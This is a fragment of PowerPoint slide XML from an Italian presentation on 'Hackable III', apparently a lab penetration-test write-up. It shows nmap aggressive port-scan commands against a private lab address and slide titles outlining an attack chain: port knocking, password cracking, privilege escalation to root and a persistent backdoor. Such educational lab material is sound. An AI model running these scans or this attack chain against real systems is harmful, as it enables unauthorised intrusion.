                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90565ABE-5416-71C1-F270-B502382E42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5395" y="3336140"/>
            <a:ext cx="3741938" cy="492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–sA –p- -oX scan.xml 10.0.2.13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AAD862-DA27-A7AE-C58D-4191F356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323761"/>
            <a:ext cx="3793027" cy="19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3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Enumerating target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2F88AB-8274-73DB-77A9-990B2339F4EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="720050" y="1086547"/>
            <a:ext cx="3201500" cy="3245064"/>
            <a:chOff x="720050" y="1086547"/>
            <a:chExt cx="3201500" cy="3245064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F9846E17-3BC4-03D5-D477-653B1A513CD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="720050" y="1086547"/>
              <a:ext cx="3201500" cy="3245064"/>
              <a:chOff x="1574100" y="1601486"/>
              <a:chExt cx="2636100" cy="3049500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574100" y="1601486"/>
                <a:ext cx="2636100" cy="304950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2EE6C4">
                      <a:alpha val="53725"/>
                      <a:alpha val="45090"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="0"/>
                      <a:alpha val="450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8" name="Google Shape;1018;p53"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1776372" y="1776748"/>
                <a:ext cx="2433828" cy="67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025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 dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent2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Attivo – Port scanning</a:t>
                </a:r>
                <a:endParaRPr sz="2600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1017" name="Google Shape;1017;p53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1316119" y="1990060"/>
              <a:ext cx="2031000" cy="12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025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nmap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-A -p- -T5 -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT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oX</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT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rlow"/>
                  <a:ea typeface="Barlow"/>
                  <a:cs typeface="Barlow"/>
                  <a:sym typeface="Barlow"/>
                </a:rPr>
                <a:t> aggressive_scan.xml 10.0.2.13</a:t>
              </a:r>
              <a:endParaRPr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541A1DD-32C9-E0F8-11FC-BA78E92B4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8" r="17116" b="1602"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4178429" y="1086547"/>
            <a:ext cx="4403090" cy="3158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CCADE2A-3E20-45D5-4F21-897C72D611F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7036593" y="3020791"/>
            <a:ext cx="1387357" cy="212469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Presentazione su schermo (16:9)</PresentationFormat>
  <Paragraphs>147</Paragraphs>
  <Slides>39</Slides>
  <Notes>39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Squada One</vt:lpstr>
      <vt:lpstr>Bahiana</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Fira Sans Extra Condensed Medium</vt:lpstr>
      <vt:lpstr>Barlow</vt:lpstr>
      <vt:lpstr>Geek Pride Day by Slidesgo</vt:lpstr>
      <vt:lpstr>Hackable III</vt:lpstr>
      <vt:lpstr>INTRODUZIONE</vt:lpstr>
      <vt:lpstr>Introduzione</vt:lpstr>
      <vt:lpstr>Introduzione</vt:lpstr>
      <vt:lpstr>Target DISCOVERY</vt:lpstr>
      <vt:lpstr>OS Fingerprinting</vt:lpstr>
      <vt:lpstr>OS Fingerprinting</vt:lpstr>
      <vt:lpstr>Enumerating target e Port scanning</vt:lpstr>
      <vt:lpstr>Enumerating target</vt:lpstr>
      <vt:lpstr>Enumerating target</vt:lpstr>
      <vt:lpstr>Homepage Kryptos – LAN </vt:lpstr>
      <vt:lpstr>Login page Kryptos – LAN </vt:lpstr>
      <vt:lpstr>Login script Kryptos – LAN </vt:lpstr>
      <vt:lpstr>Login script Kryptos – LAN </vt:lpstr>
      <vt:lpstr>VulnerabilityMAPPING</vt:lpstr>
      <vt:lpstr>Vulnerability mapping manuale</vt:lpstr>
      <vt:lpstr>Vulnerability mapping manuale</vt:lpstr>
      <vt:lpstr>Vulnerability mapping automatico</vt:lpstr>
      <vt:lpstr>Vulnerability mapping automatico</vt:lpstr>
      <vt:lpstr>Vulnerability mapping automatico</vt:lpstr>
      <vt:lpstr>Vulnerability mapping automatico</vt:lpstr>
      <vt:lpstr>Vulnerability mapping automatico</vt:lpstr>
      <vt:lpstr>Vulnerability mapping automatico</vt:lpstr>
      <vt:lpstr>Exploitation </vt:lpstr>
      <vt:lpstr>Exploitation, decodifica dati</vt:lpstr>
      <vt:lpstr>Exploitation, port knocking</vt:lpstr>
      <vt:lpstr>Exploitation, password cracking</vt:lpstr>
      <vt:lpstr>Exploitation, accesso alla macchina</vt:lpstr>
      <vt:lpstr>Privilege ESCALATION</vt:lpstr>
      <vt:lpstr>Privilege escalation, hackable_3</vt:lpstr>
      <vt:lpstr>Privilege escalation, root</vt:lpstr>
      <vt:lpstr>Privilege escalation, root</vt:lpstr>
      <vt:lpstr>Privilege escalation, root</vt:lpstr>
      <vt:lpstr>Mantaining ACCESS </vt:lpstr>
      <vt:lpstr>Backdoor persistente</vt:lpstr>
      <vt:lpstr>Backdoor persistente</vt:lpstr>
      <vt:lpstr>Backdoor persistente</vt:lpstr>
      <vt:lpstr>Conclusioni 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Hackable III</dc:title>
  <cp:lastModifiedBy>FEDERICA UNGHERESE</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-07T23:07:45Z</dcterms:modified>
</cp:coreProperties>
</file>